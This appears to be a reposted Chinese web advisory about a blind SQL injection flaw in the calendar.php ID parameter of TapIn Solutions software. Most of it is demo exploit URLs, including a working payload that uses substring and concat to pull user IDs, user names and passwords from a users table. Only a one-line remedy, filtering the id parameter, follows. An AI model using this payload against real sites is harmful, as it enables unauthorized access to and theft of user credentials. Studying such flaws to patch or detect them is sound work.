Demo Sites
Exploit
http://www.2cto.com /calendar.php?ID=28'
demo
http://www.2cto.com /calendar.php?ID=[blind sql here]
Notes
Table:users
column:user_id,user_name,password
demo exploit
http://www.2cto.com /calendar.php?id=28+and+(select substring(concat(1,concat(user_id,0x3a,user_name,0x3a,password)),1,1)+from+table_name+limit+0,1)=1
修复:过滤calendar.php页面id参数输入
查看更多关于TapIn Solutions, LLC(calendar.php)盲注缺陷及修复 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11707